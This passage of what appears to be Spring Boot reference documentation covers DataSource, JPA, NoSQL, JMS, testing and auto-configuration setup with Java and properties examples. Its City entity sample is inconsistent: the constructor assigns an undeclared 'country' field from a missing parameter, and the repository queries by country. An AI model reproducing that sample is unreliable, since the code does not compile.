Connection to a production database\nProduction database connections can also be auto-configured using a pooling\n`DataSource`. Here's the algorithm for choosing a specific implementation.\n\n* We prefer the Tomcat pooling `DataSource` for its performance and concurrency, so if\n that is available we always choose it.\n* If commons-dbcp is available we will use that, but we don't recommend it in production.\n\nIf you use the `spring-boot-starter-jdbc` or `spring-boot-starter-data-jpa`\n``starter POMs'' you will automcatically get a dependency to `tomcat-jdbc`.\n\nNOTE: Additional connection pools can always be configured manually. If you define your\nown `DataSource` bean, auto-configuration will not occur.\n\nDataSource configuration is controlled by external configuration properties in\n`spring.datasource.*`. For example, you might declare the following section\nin `application.properties`:\n\n[source,properties,indent=0]\n----\n\tspring.datasource.url=jdbc:mysql:\/\/localhost\/test\n\tspring.datasource.username=dbuser\n\tspring.datasource.password=dbpass\n\tspring.datasource.driverClassName=com.mysql.jdbc.Driver\n----\n\nSee {sc-spring-boot-autoconfigure}\/jdbc\/DataSourceProperties.{sc-ext}[`DataSourceProperties`]\nfor more of the supported options.\n\nNOTE: For a pooling `DataSource` to be created we need to be able to verify that a valid\n`Driver` class is available, so we check for that before doing anything. I.e. if you set\n`spring.datasource.driverClassName=com.mysql.jdbc.Driver` then that class has to be\nloadable.\n\n[[boot-features-using-jdbc-template]]\n=== Using JdbcTemplate\nSpring's `JdbcTemplate` and `NamedParameterJdbcTemplate` classes are auto-configured and\nyou can `@Autowire` them directly into your own beans:\n\n[source,java,indent=0]\n----\n\timport org.springframework.beans.factory.annotation.Autowired;\n\timport org.springframework.jdbc.core.JdbcTemplate;\n\timport org.springframework.stereotype.Component;\n\n\t@Component\n\tpublic class MyBean {\n\n\t\tprivate final JdbcTemplate jdbcTemplate;\n\n\t\t@Autowired\n\t\tpublic MyBean(JdbcTemplate jdbcTemplate) {\n\t\t\tthis.jdbcTemplate = jdbcTemplate;\n\t\t}\n\n\t\t\/\/ ...\n\n\t}\n----\n\n\n\n[[boot-features-jpa-and-spring-data]]\n=== JPA and ``Spring Data''\nThe Java Persistence API is a standard technology that allows you to ``map'' objects to\nrelational databases. The `spring-boot-starter-data-jpa` POM provides a quick way to get\nstarted. It provides the following key dependencies:\n\n* Hibernate -- One of the most popular JPA implementations.\n* Spring Data JPA -- Makes it easy to easily implement JPA-based repositories.\n* Spring ORMs -- Core ORM support from the Spring Framework.\n\nTIP: We won't go into too many details of JPA or Spring Data here. You can follow the\nhttp:\/\/spring.io\/guides\/gs\/accessing-data-jpa\/[``Accessing Data with JPA''] guide from\nhttp:\/\/spring.io and read the http:\/\/projects.spring.io\/spring-data-jpa\/[Spring Data JPA]\nand http:\/\/hibernate.org\/orm\/documentation\/[Hibernate] reference documentation.\n\n\n\n[[boot-features-entity-classes]]\n==== Entity Classes\nTraditionally, JPA ``Entity'' classes are specified in a `persistence.xml` file. With\nSpring Boot this file is not necessary and instead ``Entity Scanning'' is used. By\ndefault all packages below your main configuration class (the one annotated with\n`@EnableAutoConfiguration`) will be searched.\n\nAny classes annotated with `@Entity`, `@Embeddable` or `@MappedSuperclass` will be\nconsidered. A typical entity class would look something like this:\n\n[source,java,indent=0]\n----\n\tpackage com.example.myapp.domain;\n\n\timport java.io.Serializable;\n\timport javax.persistence.*;\n\n\t@Entity\n\tpublic class City implements Serializable {\n\n\t\t@Id\n\t\t@GeneratedValue\n\t\tprivate Long id;\n\n\t\t@Column(nullable = false)\n\t\tprivate String name;\n\n\t\t@Column(nullable = false)\n\t\tprivate String state;\n\n\t\t\/\/ ... additional members, often include @OneToMany mappings\n\n\t\tprotected City() {\n\t\t\t\/\/ no-args constructor required by JPA spec\n\t\t\t\/\/ this one is protected since it shouldn't be used directly\n\t\t}\n\n\t\tpublic City(String name, String state) {\n\t\t\tthis.name = name;\n\t\t\tthis.country = country;\n\t\t}\n\n\t\tpublic String getName() {\n\t\t\treturn this.name;\n\t\t}\n\n\t\tpublic String getState() {\n\t\t\treturn this.state;\n\t\t}\n\n\t\t\/\/ ... etc\n\n\t}\n----\n\nTIP: You can customize entity scanning locations using the `@EntityScan` annotation.\nSee the '<<howto.adoc#howto-separate-entity-definitions-from-spring-configuration>>'\nhow-to.\n\n\n[[boot-features-spring-data-jpa-repositories]]\n==== Spring Data JPA Repositories\nSpring Data JPA repositories are interfaces that you can define to access data. JPA\nqueries are created automatically from your method names. For example, a `CityRepository`\ninterface might declare a `findAllByState(String state)` method to find all cities\nin a given state.\n\nFor more complex queries you can annotate your method using Spring Data's\n{spring-data-javadoc}\/repository\/Query.html[`Query`] annotation.\n\nSpring Data repositories usually extend from the\n{spring-data-commons-javadoc}\/repository\/Repository.html[`Repository`] or\n{spring-data-commons-javadoc}\/repository\/CrudRepository.html[`CrudRepository`] interfaces. If you are using\nauto-configuration, repositories will be searched from the package containing your\nmain configuration class (the one annotated with `@EnableAutoConfiguration`) down.\n\nHere is a typical Spring Data repository:\n\n[source,java,indent=0]\n----\n\tpackage com.example.myapp.domain;\n\n\timport org.springframework.data.domain.*;\n\timport org.springframework.data.repository.*;\n\n\tpublic interface CityRepository extends Repository<City, Long> {\n\n\t\tPage<City> findAll(Pageable pageable);\n\n\t\tCity findByNameAndCountryAllIgnoringCase(String name, String country);\n\n\t}\n----\n\nTIP: We have barely scratched the surface of Spring Data JPA. For complete details check\ntheir http:\/\/projects.spring.io\/spring-data-jpa\/[reference documentation].\n\n\n\n[[boot-features-creating-and-dropping-jpa-databases]]\n==== Creating and dropping JPA databases\nBy default JPA database will be automatically created *only* if you use an embedded\ndatabase (H2, HSQL or Derby). You can explicitly configure JPA settings using\n`spring.jpa.*` properties. For example, to create and drop tables you can add the\nfollowing to your `application.properties`.\n\n[indent=0]\n----\n\tspring.jpa.hibernate.ddl-auto=create-drop\n----\n\nNOTE: Hibernate's own internal property name for this (if you happen to remember it\nbetter) is `hibernate.hbm2ddl.auto`. You can set it, along with other Hibernate native\nproperties, using `spring.jpa.properties.*` (the prefix is stripped before adding them\nto the entity manager). By default the DDL execution (or validation) is deferred until\nthe `ApplicationContext` has started. There is also a `spring.jpa.generate-ddl` flag, but\nit is not used if Hibernate autoconfig is active because the `ddl-auto`\nsettings are more fine grained.\n\n\n\n[[boot-features-nosql]]\n== Working with NoSQL technologies\nSpring Data provides additional projects that help you access a variety of NoSQL\ntechnologies including\nhttp:\/\/projects.spring.io\/spring-data-mongodb\/[MongoDB],\nhttp:\/\/projects.spring.io\/spring-data-neo4j\/[Neo4J],\nhttps:\/\/github.com\/spring-projects\/spring-data-elasticsearch\/[Elasticsearch],\nhttp:\/\/projects.spring.io\/spring-data-solr\/[Solr],\nhttp:\/\/projects.spring.io\/spring-data-redis\/[Redis],\nhttp:\/\/projects.spring.io\/spring-data-gemfire\/[Gemfire],\nhttp:\/\/projects.spring.io\/spring-data-couchbase\/[Couchbase] and\nhttp:\/\/projects.spring.io\/spring-data-cassandra\/[Cassandra].\nSpring Boot provides auto-configuration for Redis, MongoDB, Elasticsearch, Solr and\nGemfire; you can make use of the other projects, but you will need to configure them\nyourself. Refer to the appropriate reference documentation at\nhttp:\/\/projects.spring.io\/spring-data[projects.spring.io\/spring-data].\n\n\n\n[[boot-features-redis]]\n=== Redis\nhttp:\/\/redis.io\/[Redis] is a cache, message broker and richly-featured key-value store.\nSpring Boot offers basic auto-configuration for the https:\/\/github.com\/xetorthio\/jedis\/[Jedis]\nclient library and abstractions on top of it provided by\nhttps:\/\/github.com\/spring-projects\/spring-data-redis[Spring Data Redis]. There is a\n`spring-boot-starter-redis` ``Starter POM'' for collecting the dependencies in a\nconvenient way.\n\n\n\n[[boot-features-connecting-to-redis]]\n==== Connecting to Redis\nYou can inject an auto-configured `RedisConnectionFactory`, `StringRedisTemplate` or\nvanilla `RedisTemplate` instance as you would any other Spring Bean. By default the\ninstance will attempt to connect to a Redis server using `localhost:6379`:\n\n[source,java,indent=0]\n----\n\t@Component\n\tpublic class MyBean {\n\n\t\tprivate StringRedisTemplate template;\n\n\t\t@Autowired\n\t\tpublic MyBean(StringRedisTemplate template) {\n\t\t\tthis.template = template;\n\t\t}\n\n\t\t\/\/ ...\n\n\t}\n----\n\nIf you add a `@Bean` of your own of any of the auto-configured types it will replace the\ndefault (except in the case of `RedisTemplate` the exclusion is based on the bean name\n``redisTemplate'' not its type). If `commons-pool2` is on the classpath you will get a\npooled connection factory by default.\n\n\n\n[[boot-features-mongodb]]\n=== MongoDB\nhttp:\/\/www.mongodb.com\/[MongoDB] is an open-source NoSQL document database that uses a\nJSON-like schema instead of traditional table-based relational data. Spring Boot offers\nseveral conveniences for working with MongoDB, including the The\n`spring-boot-starter-data-mongodb` ``Starter POM''.\n\n\n\n[[boot-features-connecting-to-mongodb]]\n==== Connecting to a MongoDB database\nYou can inject an auto-configured `com.mongodb.Mongo` instance as you would any other\nSpring Bean. By default the instance will attempt to connect to a MongoDB server using\nthe URL `mongodb:\/\/localhost\/test`:\n\n[source,java,indent=0]\n----\n\timport com.mongodb.Mongo;\n\n\t@Component\n\tpublic class MyBean {\n\n\t\tprivate final Mongo mongo;\n\n\t\t@Autowired\n\t\tpublic MyBean(Mongo mongo) {\n\t\t\tthis.mongo = mongo;\n\t\t}\n\n\t\t\/\/ ...\n\n\t}\n----\n\nYou can set `spring.data.mongodb.uri` property to change the `url`, or alternatively\nspecify a `host`\/`port`. For example, you might declare the following in your\n`application.properties`:\n\n[source,properties,indent=0]\n----\n\tspring.data.mongodb.host=mongoserver\n\tspring.data.mongodb.port=27017\n----\n\nTIP: If `spring.data.mongodb.port` is not specified the default of `27017` is used. You\ncould simply delete this line from the sample above.\n\nYou can also declare your own `Mongo` `@Bean` if you want to take complete control of\nestablishing the MongoDB connection.\n\n\n\n[[boot-features-mongo-template]]\n==== MongoTemplate\nSpring Data Mongo provides a {spring-data-mongo-javadoc}\/core\/MongoTemplate.html[`MongoTemplate`]\nclass that is very similar in its design to Spring's `JdbcTemplate`. As with\n`JdbcTemplate` Spring Boot auto-configures a bean for you to simply inject:\n\n[source,java,indent=0]\n----\n\timport org.springframework.beans.factory.annotation.Autowired;\n\timport org.springframework.data.mongodb.core.MongoTemplate;\n\timport org.springframework.stereotype.Component;\n\n\t@Component\n\tpublic class MyBean {\n\n\t\tprivate final MongoTemplate mongoTemplate;\n\n\t\t@Autowired\n\t\tpublic MyBean(MongoTemplate mongoTemplate) {\n\t\t\tthis.mongoTemplate = mongoTemplate;\n\t\t}\n\n\t\t\/\/ ...\n\n\t}\n----\n\nSee the `MongoOperations` Javadoc for complete details.\n\n\n\n[[boot-features-spring-data-mongo-repositories]]\n==== Spring Data MongoDB repositories\nSpring Data includes repository support for MongoDB. As with the JPA repositories\ndiscussed earlier, the basic principle is that queries are constructed for you\nautomatically based on method names.\n\nIn fact, both Spring Data JPA and Spring Data MongoDB share the same common\ninfrastructure; so you could take the JPA example from earlier and, assuming that\n`City` is now a Mongo data class rather than a JPA `@Entity`, it will work in the\nsame way.\n\n[source,java,indent=0]\n----\n\tpackage com.example.myapp.domain;\n\n\timport org.springframework.data.domain.*;\n\timport org.springframework.data.repository.*;\n\n\tpublic interface CityRepository extends Repository<City, Long> {\n\n\t\tPage<City> findAll(Pageable pageable);\n\n\t\tCity findByNameAndCountryAllIgnoringCase(String name, String country);\n\n\t}\n----\n\nTIP: For complete details of Spring Data MongoDB, including its rich object mapping\ntechnologies, refer to their http:\/\/projects.spring.io\/spring-data-mongodb\/[reference\ndocumentation].\n\n\n\n[[boot-features-gemfire]]\n=== Gemfire\nhttps:\/\/github.com\/spring-projects\/spring-data-gemfire[Spring Data Gemfire] provides\nconvenient Spring-friendly tools for accessing the http:\/\/www.gopivotal.com\/big-data\/pivotal-gemfire#details[Pivotal Gemfire]\ndata management platform. There is a `spring-boot-starter-data-gemfire` ``Starter POM''\nfor collecting the dependencies in a convenient way. There is currently no auto=config\nsupport for Gemfire, but you can enable Spring Data Repositories with a\nhttps:\/\/github.com\/spring-projects\/spring-data-gemfire\/blob\/master\/src\/main\/java\/org\/springframework\/data\/gemfire\/repository\/config\/EnableGemfireRepositories.java[single annotation].\n\n\n\n[[boot-features-solr]]\n=== Solr\nhttp:\/\/lucene.apache.org\/solr\/[Apache Solr] is a search engine. Spring Boot offers basic\nauto-configuration for the solr client library and abstractions on top of it provided by\nhttps:\/\/github.com\/spring-projects\/spring-data-solr[Spring Data Solr]. There is\na `spring-boot-starter-data-solr` ``Starter POM'' for collecting the dependencies in a\nconvenient way.\n\n\n\n[[boot-features-connecting-to-solr]]\n==== Connecting to Solr\nYou can inject an auto-configured `SolrServer` instance as you would any other Spring\nBean. By default the instance will attempt to connect to a server using\n`http:\/\/localhost:8983\/solr`:\n\n[source,java,indent=0]\n----\n\t@Component\n\tpublic class MyBean {\n\n\t\tprivate SolrServer solr;\n\n\t\t@Autowired\n\t\tpublic MyBean(SolrServer solr) {\n\t\t\tthis.solr = solr;\n\t\t}\n\n\t\t\/\/ ...\n\n\t}\n----\n\nIf you add a `@Bean` of your own of type `SolrServer` it will replace the default.\n\n\n\n[[boot-features-spring-data-solr-repositories]]\n==== Spring Data Solr repositories\nSpring Data includes repository support for Apache Solr. As with the JPA repositories\ndiscussed earlier, the basic principle is that queries are constructed for you\nautomatically based on method names.\n\nIn fact, both Spring Data JPA and Spring Data Solr share the same common infrastructure;\nso you could take the JPA example from earlier and, assuming that `City` is now a\n`@SolrDocument` class rather than a JPA `@Entity`, it will work in the same way.\n\nTIP: For complete details of Spring Data Solr, refer to their\nhttp:\/\/projects.spring.io\/spring-data-solr\/[reference documentation].\n\n\n\n[[boot-features-elasticsearch]]\n=== Elasticsearch\nhttp:\/\/www.elasticsearch.org\/[Elastic Search] is an open source, distributed,\nreal-time search and analytics engine. Spring Boot offers basic auto-configuration for\nthe Elasticsearch and abstractions on top of it provided by\nhttps:\/\/github.com\/spring-projects\/spring-data-elasticsearch[Spring Data Elasticsearch].\nThere is a `spring-boot-starter-data-elasticsearch` ``Starter POM'' for collecting the\ndependencies in a convenient way.\n\n\n\n[[boot-features-connecting-to-elasticsearch]]\n==== Connecting to Elasticsearch\nYou can inject an auto-configured `ElasticsearchTemplate` or Elasticsearch `Client`\ninstance as you would any other Spring Bean. By default the instance will attempt to\nconnect to a local in-memory server (a `NodeClient` in Elasticsearch terms), but you can\nswitch to a remote server (i.e. a `TransportClient`) by setting\n`spring.data.elasticsearch.clusterNodes` to a comma-separated ``host:port'' list.\n\n[source,java,indent=0]\n----\n\t@Component\n\tpublic class MyBean {\n\n\t\tprivate ElasticsearchTemplate template;\n\n\t\t@Autowired\n\t\tpublic MyBean(ElasticsearchTemplate template) {\n\t\t\tthis.template = template;\n\t\t}\n\n\t\t\/\/ ...\n\n\t}\n----\n\nIf you add a `@Bean` of your own of type `ElasticsearchTemplate` it will replace the\ndefault.\n\n\n\n[[boot-features-spring-data-elasticsearch-repositories]]\n==== Spring Data Elasticsearch repositories\nSpring Data includes repository support for Elasticsearch. As with the JPA repositories\ndiscussed earlier, the basic principle is that queries are constructed for you\nautomatically based on method names.\n\nIn fact, both Spring Data JPA and Spring Data Elasticsearch share the same common\ninfrastructure; so you could take the JPA example from earlier and, assuming that\n`City` is now an Elasticsearch `@Document` class rather than a JPA `@Entity`, it will\nwork in the same way.\n\nTIP: For complete details of Spring Data Elasticsearch, refer to their\nhttp:\/\/docs.spring.io\/spring-data\/elasticsearch\/docs\/[reference documentation].\n\n\n\n[[boot-features-messaging]]\n== Messaging\nThe Spring Framework provides extensive support for integrating with messaging systems:\nfrom simplified use of the JMS API using `JmsTemplate` to a complete infrastructure to\nreceive messages asynchronously. Spring AMQP provides a similar feature set for the\n``Advanced Message Queuing Protocol'' and Boot also provides auto-configuration options\nfor `RabbitTemplate` and RabbitMQ. There is also support for STOMP messaging natively\nin Spring Websocket and Spring Boot has support for that through starters and a small\namount of auto configuration.\n\n\n\n[[boot-features-jms]]\n=== JMS\nThe `javax.jms.ConnectionFactory` interface provides a standard method of creating a\n`javax.jms.Connection` for interacting with a JMS broker. Although Spring needs a\n`ConnectionFactory` to work with JMS, you generally won't need to use it directly yourself\nand you can instead rely on higher level messaging abstractions (see the\n{spring-reference}\/#jms[relevant section] of the Spring Framework reference\ndocumentation for details).\n\n\n\n[[boot-features-hornetq]]\n==== HornetQ support\nSpring Boot can auto-configure a `ConnectionFactory` when it detects that HornetQ is\navailable on the classpath. If the broker is present, an embedded broker is started and\nconfigured automatically (unless the mode property has been explicitly set). The supported\nmodes are: `embedded` (to make explicit that an embedded broker is required and should\nlead to an error if the broker is not available in the classpath), and `native` to\nconnect to a broker using the the `netty` transport protocol. When the latter is\nconfigured, Spring Boot configures a `ConnectionFactory` connecting to a broker running\non the local machine with the default settings.\n\nNOTE: if you are using `spring-boot-starter-hornetq` the necessary dependencies to\nconnect to an existing HornetQ instance are provided, as well as the Spring infrastructure\nto integrate with JMS. Adding `org.hornetq:hornetq-jms-server` to your application allows\nyou to use the embedded mode.\n\nHornetQ configuration is controlled by external configuration properties in\n`spring.hornetq.*`. For example, you might declare the following section in\n`application.properties`:\n\n[source,properties,indent=0]\n----\n\tspring.hornetq.mode=native\n\tspring.hornetq.host=192.168.1.210\n\tspring.hornetq.port=9876\n----\n\nWhen embedding the broker, you can chose if you want to enable persistence, and the list\nof destinations that should be made available. These can be specified as a comma separated\nlist to create them with the default options; or you can define bean(s) of type\n`org.hornetq.jms.server.config.JMSQueueConfiguration` or\n`org.hornetq.jms.server.config.TopicConfiguration`, for advanced queue and topic\nconfigurations respectively.\n\nSee {sc-spring-boot-autoconfigure}\/jms\/hornetq\/HornetQProperties.{sc-ext}[`HornetQProperties`]\nfor more of the supported options.\n\nNo JNDI lookup is involved at all and destinations are resolved against their names,\neither using the ``name'' attribute in the HornetQ configuration or the names provided\nthrough configuration.\n\n\n\n[[boot-features-activemq]]\n==== ActiveMQ support\nSpring Boot can also configure a `ConnectionFactory` when it detects that ActiveMQ is\navailable on the classpath. If the broker is present, an embedded broker is started and\nconfigured automatically (as long as no broker URL is specified through configuration).\n\nActiveMQ configuration is controlled by external configuration properties in\n`spring.activemq.*`. For example, you might declare the following section in\n`application.properties`:\n\n[source,properties,indent=0]\n----\n\tspring.activemq.broker-url=tcp:\/\/192.168.1.210:9876\n\tspring.activemq.user=admin\n\tspring.activemq.password=secret\n----\n\nSee {sc-spring-boot-autoconfigure}\/jms\/activemq\/ActiveMQProperties.{sc-ext}[`ActiveMQProperties`]\nfor more of the supported options.\n\nBy default, ActiveMQ creates a destination if it does not exist yet, so destinations are\nresolved against their provided names.\n\n\n\n[[boot-features-using-jms-template]]\n==== Using JmsTemplate\nSpring's `JmsTemplate` is auto-configured and you can `@Autowire` it directly into your\nown beans:\n\n[source,java,indent=0]\n----\n\timport org.springframework.beans.factory.annotation.Autowired;\n\timport org.springframework.jms.core.JmsTemplate;\n\timport org.springframework.stereotype.Component;\n\n\t@Component\n\tpublic class MyBean {\n\n\t\tprivate final JmsTemplate jmsTemplate;\n\n\t\t@Autowired\n\t\tpublic MyBean(JmsTemplate jmsTemplate) {\n\t\t\tthis.jmsTemplate = jmsTemplate;\n\t\t}\n\n\t\t\/\/ ...\n\n\t}\n----\n\n\n\n[[boot-features-integration]]\n== Spring Integration\nSpring Integration provides abstractions over messaging and also other transports such as\nHTTP, TCP etc. If Spring Integration is available on your classpath it will be initialized\nthrough the `@EnableIntegration` annotation. Message processing statistics will be\npublished over JMX if ``spring-integration-jmx'' is also on the classpath.\nSee the {sc-spring-boot-autoconfigure}\/integration\/IntegrationAutoConfiguration.{sc-ext}[`IntegrationAutoConfiguration`]\nclass for more details.\n\n\n\n[[boot-features-jmx]]\n== Monitoring and management over JMX\nJava Management Extensions (JMX) provide a standard mechanism to monitor and manage\napplications. By default Spring Boot will create an `MBeanServer` with bean id\n``mbeanServer'' and expose any of your beans that are annotated with Spring JMX\nannotations (`@ManagedResource`, `@ManagedAttribute`, `@ManagedOperation`).\n\nSee the {sc-spring-boot-autoconfigure}\/jmx\/JmxAutoConfiguration.{sc-ext}[`JmxAutoConfiguration`]\nclass for more details.\n\n\n\n[[boot-features-testing]]\n== Testing\nSpring Boot provides a number of useful tools for testing your application. The\n`spring-boot-starter-test` POM provides Spring Test, JUnit, Hamcrest and Mockito\ndependencies. There are also useful test utilities in the core `spring-boot` module\nunder the `org.springframework.boot.test` package.\n\n\n\n[[boot-features-test-scope-dependencies]]\n=== Test scope dependencies\nIf you use the\n`spring-boot-starter-test` ``Starter POM'' (in the `test` `scope`), you will find\nthe following provided libraries:\n\n* Spring Test -- integration test support for Spring applications.\n* Junit -- The de-facto standard for unit testing Java applications.\n* Hamcrest -- A library of matcher objects (also known as constraints or predicates)\n allowing `assertThat` style JUnit assertions.\n* Mockito -- A Java mocking framework.\n\nThese are common libraries that we generally find useful when writing tests. You are free\nto add additional test dependencies of your own if these don't suit your needs.\n\n\n[[boot-features-testing-spring-applications]]\n=== Testing Spring applications\nOne of the major advantages of dependency injection is that it should make your code\neasier to unit test. You can simply instantiate objects using the `new` operator without\neven involving Spring. You can also use _mock objects_ instead of real dependencies.\n\nOften you need to move beyond ``unit testing'' and start ``integration testing'' (with\na Spring `ApplicationContext` actually involved in the process). It's useful to be able\nto perform integration testing without requiring deployment of your application or\nneeding to connect to other infrastructure.\n\nThe Spring Framework includes a dedicated test module for just such integration testing.\nYou can declare a dependency directly to `org.springframework:spring-test` or use the\n`spring-boot-starter-test` ``Starter POM'' to pull it in transitively.\n\nIf you have not used the `spring-test` module before you should start by reading the\n{spring-reference}\/#testing[relevant section] of the Spring Framework reference\ndocumentation.\n\n\n\n[[boot-features-testing-spring-boot-applications]]\n=== Testing Spring Boot applications\nA Spring Boot application is just a Spring `ApplicationContext` so nothing very special\nhas to be done to test it beyond what you would normally do with a vanilla Spring context.\nOne thing to watch out for though is that the external properties, logging and other\nfeatures of Spring Boot are only installed in the context by default if you use\n`SpringApplication` to create it.\n\nSpring Boot provides a `@SpringApplicationConfiguration` annotation as an alternative\nto the standard `spring-test` `@ContextConfiguration` annotation. If you use\n`@SpringApplicationConfiguration` to configure the `ApplicationContext` used in your\ntests, it will be created via `SpringApplication` and you will get the additional Spring\nBoot features.\n\nFor example:\n[source,java,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t@RunWith(SpringJUnit4ClassRunner.class)\n\t@SpringApplicationConfiguration(classes = SampleDataJpaApplication.class)\n\tpublic class CityRepositoryIntegrationTests {\n\n\t\t@Autowired\n\t\tCityRepository repository;\n\n\t\t\/\/ ...\n\n\t}\n----\n\nTIP: The context loader guesses whether you want to test a web application or not (e.g.\nwith `MockMVC`) by looking for the `@WebAppConfiguration` annotation. (`MockMVC` and\n`@WebAppConfiguration` are part of `spring-test`).\n\nIf you want a web application to start up and listen on its normal port, so you can test\nit with HTTP (e.g. using `RestTemplate`), annotate your test class (or one of its\nsuperclasses) with `@IntegrationTest`. This can be very useful because it means you can\ntest the full stack of your application, but also inject its components into the test\nclass and use them to assert the internal state of the application after an HTTP\ninteraction. For Example:\n\n[source,java,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t@RunWith(SpringJUnit4ClassRunner.class)\n\t@SpringApplicationConfiguration(classes = SampleDataJpaApplication.class)\n\t@WebAppConfiguration\n\t@IntegrationTest\n\tpublic class CityRepositoryIntegrationTests {\n\n\t\t@Autowired\n\t\tCityRepository repository;\n\n\t\tRestTemplate restTemplate = new TestRestTemplate();\n\n\t\t\/\/ ... interact with the running server\n\n\t}\n----\n\nNOTE: Spring's test framework will cache application contexts between tests. Therefore,\nas long as your tests share the same configuration, the time consuming process of starting\nand stopping the server will only happen once, regardless of the number of tests that\nactually run.\n\nTo change the port you can add environment properties to `@IntegrationTest` as colon- or\nequals-separated name-value pairs, e.g. `@IntegrationTest(\"server.port:9000\")`.\nAdditionally you can set the `server.port` and `management.port` properties to `0`\nin order to run your integration tests using random ports. For example:\n\n[source,java,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t@RunWith(SpringJUnit4ClassRunner.class)\n\t@SpringApplicationConfiguration(classes = MyApplication.class)\n\t@WebAppConfiguration\n\t@IntegrationTest({\"server.port=0\", \"management.port=0\"})\n\tpublic class SomeIntegrationTests {\n\n\t\t\/\/ ...\n\n\t}\n----\n\nSee <<howto-discover-the-http-port-at-runtime>> for a description of how you can discover\nthe actual port that was allocated for the duration of the tests.\n\n\n\n[[boot-features-testing-spring-boot-applications-with-spock]]\n==== Using Spock to test Spring Boot applications\nIf you wish to use Spock to test a Spring Boot application you should add a dependency\non Spock's `spock-spring` module to your application's build. `spock-spring` integrates\nSpring's test framework into Spock.\n\nPlease note that you cannot use the `@SpringApplicationConfiguration` annotation that was\n<<boot-features-testing-spring-boot-applications,described above>> as Spock\nhttps:\/\/code.google.com\/p\/spock\/issues\/detail?id=349[does not find the\n`@ContextConfiguration` meta-annotation]. To work around this limitation, you should use\nthe `@ContextConfiguration` annotation directly and configure it to use the Spring\nBoot specific context loader:\n\n[source,groovy,indent=0]\n----\n\t@ContextConfiguration(loader = SpringApplicationContextLoader.class)\n\tclass ExampleSpec extends Specification {\n\n\t\t\/\/ ...\n\n\t}\n----\n\n\n\n[[boot-features-test-utilities]]\n=== Test utilities\nA few test utility classes are packaged as part of `spring-boot` that are generally\nuseful when testing your application.\n\n\n\n[[boot-features-configfileapplicationcontextinitializer-test-utility]]\n==== ConfigFileApplicationContextInitializer\n`ConfigFileApplicationContextInitializer` is an `ApplicationContextInitializer` that\ncan apply to your tests to load Spring Boot `application.properties` files. You can use\nthis when you don't need the full features provided by `@SpringApplicationConfiguration`.\n\n[source,java,indent=0]\n----\n\t@ContextConfiguration(classes = Config.class,\n\t\tinitializers = ConfigFileApplicationContextInitializer.class)\n----\n\n\n\n[[boot-features-environment-test-utilities]]\n==== EnvironmentTestUtils\n`EnvironmentTestUtils` allows you to quickly add properties to a\n`ConfigurableEnvironment` or `ConfigurableApplicationContext`. Simply call it with\n`key=value` strings:\n\n[source,java,indent=0]\n----\nEnvironmentTestUtils.addEnvironment(env, \"org=Spring\", \"name=Boot\");\n----\n\n\n\n[[boot-features-output-capture-test-utility]]\n==== OutputCapture\n`OutputCapture` is a JUnit `Rule` that you can use to capture `System.out` and\n`System.err` output. Simply declare the capture as a `@Rule` then use `toString()`\nfor assertions:\n\n[source,java,indent=0]\n----\nimport org.junit.Rule;\nimport org.junit.Test;\nimport org.springframework.boot.test.OutputCapture;\n\nimport static org.hamcrest.Matchers.*;\nimport static org.junit.Assert.*;\n\npublic class MyTest {\n\n\t@Rule\n\tpublic OutputCapture capture = new OutputCapture();\n\n\t@Test\n\tpublic void testName() throws Exception {\n\t\tSystem.out.println(\"Hello World!\");\n\t\tassertThat(capture.toString(), containsString(\"World\"));\n\t}\n\n}\n----\n\n[[boot-features-rest-templates-test-utility]]\n==== TestRestTemplate\n\n`TestRestTemplate` is a convenience subclass of Spring's `RestTemplate` that is\nuseful in integration tests. You can get a vanilla template or one that sends Basic HTTP\nauthentication (with a username and password). In either case the template will behave\nin a test-friendly way: not following redirects (so you can assert the response\nlocation), ignoring cookies (so the template is stateless), and not throwing exceptions\non server-side errors. It is recommended, but not mandatory, to use Apache HTTP Client\n(version 4.3.2 or better), and if you have that on your classpath the `TestRestTemplate`\nwill respond by configuring the client appropriately.\n\n[source,java,indent=0]\n----\npublic class MyTest {\n\n\tRestTemplate template = new TestRestTemplate();\n\n\t@Test\n\tpublic void testRequest() throws Exception {\n\t\tHttpHeaders headers = template.getForEntity(\"http:\/\/myhost.com\", String.class).getHeaders();\n\t\tassertThat(headers.getLocation().toString(), containsString(\"myotherhost\"));\n\t}\n\n}\n----\n\n\n\n[[boot-features-developing-auto-configuration]]\n== Developing auto-configuration and using conditions\nIf you work in a company that develops shared libraries, or if you work on an open-source\nor commercial library, you might want to develop your own auto-configuration.\nAuto-configuration classes can be bundled in external jars and still be picked-up by\nSpring Boot.\n\n\n\n[[boot-features-understanding-auto-configured-beans]]\n=== Understanding auto-configured beans\nUnder the hood, auto-configuration is implemented with standard `@Configuration` classes.\nAdditional `@Conditional` annotations are used to constrain when the auto-configuration\nshould apply. Usually auto-configuration classes use `@ConditionalOnClass` and\n`@ConditionalOnMissingBean` annotations. This ensures that auto-configuration only\napplies when relevant classes are found and when you have not declared your own\n`@Configuration`.\n\nYou can browse the source code of `spring-boot-autoconfigure` to see the `@Configuration`\nclasses that we provide (see the `META-INF\/spring.factories` file).\n\n\n\n[[boot-features-locating-auto-configuration-candidates]]\n=== Locating auto-configuration candidates\nSpring Boot checks for the presence of a `META-INF\/spring.factories` file within your\npublished jar. The file should list your configuration classes under the\n`EnableAutoConfiguration` key.\n\n[indent=0]\n----\n\torg.springframework.boot.autoconfigure.EnableAutoConfiguration=\\\n\tcom.mycorp.libx.autoconfigure.LibXAutoConfiguration,\\\n\tcom.mycorp.libx.autoconfigure.LibXWebAutoConfiguration\n----\n\nYou can use the\n{sc-spring-boot-autoconfigure}\/AutoConfigureAfter.{sc-ext}[`@AutoConfigureAfter`] or\n{sc-spring-boot-autoconfigure}\/AutoConfigureBefore.{sc-ext}[`@AutoConfigureBefore`]\nannotations if your configuration needs to be applied in a specific order. For example,\nif you provide web specific configuration, your class may need to be applied after\n`WebMvcAutoConfiguration`.\n\n\n\n[[boot-features-condition-annotations]]\n=== Condition annotations\nYou almost always want to include one or more `@Condition` annotations on your\nauto-configuration class. The `@ConditionalOnMissingBean` is one common example that is\nused to allow developers to ``override'' auto-configuration if they are not happy with\nyour defaults.\n\nSpring Boot includes a number of `@Conditional` annotations that you can reuse in your own\ncode by annotating `@Configuration` classes or individual `@Bean` methods.\n\n\n\n[[boot-features-class-conditions]]\n==== Class conditions\nThe `@ConditionalOnClass` and `@ConditionalOnMissingClass` annotations allows configuration\nto be skipped based on the presence or absence of specific 